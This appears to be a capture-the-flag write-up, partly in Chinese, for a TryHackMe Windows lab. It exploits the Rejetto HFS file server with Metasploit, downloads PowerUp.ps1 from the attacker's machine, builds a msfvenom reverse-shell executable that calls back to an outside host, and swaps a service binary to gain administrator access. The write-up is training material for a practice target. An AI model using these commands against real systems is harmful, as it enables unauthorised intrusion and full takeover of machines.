【THM】Steel Mountain-Practice

Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.

Initial Access

1
nmap -p- -sC -sV -T4 10.10.153.112 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: STEELMOUNTAIN
|   NetBIOS_Domain_Name: STEELMOUNTAIN
|   NetBIOS_Computer_Name: STEELMOUNTAIN
|   DNS_Domain_Name: steelmountain
|   DNS_Computer_Name: steelmountain
|   Product_Version: 6.3.9600
|_  System_Time: 2024-01-11T14:43:54+00:00
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2024-01-10T14:05:59
|_Not valid after:  2024-07-11T14:05:59
|_ssl-date: 2024-01-11T14:43:59+00:00; -1s from scanner time.
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp  open  http               HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49169/tcp open  msrpc              Microsoft Windows RPC
49170/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-01-11T14:43:53
|_  start_date: 2024-01-11T14:05:48
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:2f:d5:76:10:39 (unknown)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

https://www.exploit-db.com/exploits/39161

可以看到39161.py

image-20240111225631351

image-20240111225944229

根据该漏洞,我们需要通过 http 服务器托管 netcat,并设置一个 netcat 侦听器来捕获我们的反向 shell。我制作了 netcat 的副本并将其放在桌面上的一个目录中,在另一个终端中设置了我的 netcat 侦听器,然后使用 python -m http.server 80将 necat 提供给目标

image-20240111232952303

image-20240111233134823

Privilege Escalation

现在,您在这台 Windows 机器上拥有了作为 Bill 的初始 shell,我们可以进一步枚举该机器并将我们的权限升级到 root!

为了枚举这台机器,我们将使用一个名为 PowerUp 的 powershell 脚本,其目的是评估 Windows 机器并确定任何异常情况 - “PowerUp 旨在成为依赖于错误配置的常见 Windows 权限提升向量的交流中心。”

首先用msf

1
search cve-2014-6287
1
2
3
4
5
6
7
msf6 exploit(windows/http/rejetto_hfs_exec) > set rport 8080

msf6 exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.65.105

msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.11.63.201

msf6 exploit(windows/http/rejetto_hfs_exec) > run

或者

image-20240112145554866

1
2
3
PS > wget "http://10.11.63.201:80/PowerUp.ps1" -outfile "PowerUp.ps1"
PS> . .\PowerUp.ps1
PS> Invoke-AllChecks

image-20240112145535778

CanRestart 选项为 true,允许我们在系统上重新启动服务,应用程序的目录也是可写的。这意味着我们可以用我们的恶意应用程序替换合法应用程序,重新启动服务,这将运行我们受感染的程序!

image-20240112145719559

使用 msfvenom 生成反向 shell 作为 Windows 可执行文件。

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.63.201 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
1
2
3
4
5
6
meterpreter> background
msf6 exploit(windows/http/rejetto_hfs_exec)> use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 4443
msf6 exploit(multi/handler) > exploit -j
msf6 exploit(multi/handler) > sessions // show the current session number

之后,将Advanced.exe上传到“C:\Program Files (x86)\IObit”。

1
2
3
4
5
6
7
meterpreter > cd C:/
meterpreter > cd "Program Files (x86)"
meterpreter > cd IObit
meterpreter > upload Advanced.exe
[*] Uploading  : /root/Advanced.exe -> Advanced.exe
[*] Uploaded 15.50 KiB of 15.50 KiB (100.0%): /root/Advanced.exe -> Advanced.exe
[*] Completed  : /root/Advanced.exe -> Advanced.exe

将exe文件上传到“IObit”文件夹后,在meterpreter中键入shell,然后“停止AdvancedSystemCareService9”,将Advanced.exe复制到“Advanced SystemCare”文件夹,然后“启动AdvancedSystemCareService9”,即可,见下图

image-20240112151254601

image-20240112151342375

Access and Escalation Without Metasploit

现在让我们在不使用 Metasploit 的情况下完成房间。

为此,我们将利用 powershell 和 winPEAS 来枚举系统并收集相关信息以升级到

1
powershell -c wget "http://10.11.63.201:80/PowerUp.ps1" -outfile "PowerUp.ps1"

image-20240112000538748

运行的话

1
powershell -c wget "http://10.11.63.201:80/PowerUp.ps1" -outfile "PowerUp.ps1"
1
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

image-20240112002136783

有几种未加引号的路径服务可用,但这并不意味着我们有权在其中进行编辑或写入。这就是accesschk.exe派上用场的地方。

accesschk.exe reveals ‘bill’ has write access to “ C:\Program Files (x86)\IObit* “. If we modify the next PATH that the service checks for the executable related to AdvancedSystemCareService9, we can trick the service to run something else, such as a reverse shell.

FINALLY

我们可以运行什么powershell -c命令来手动查找服务名称?

1
powershell -c Get-Service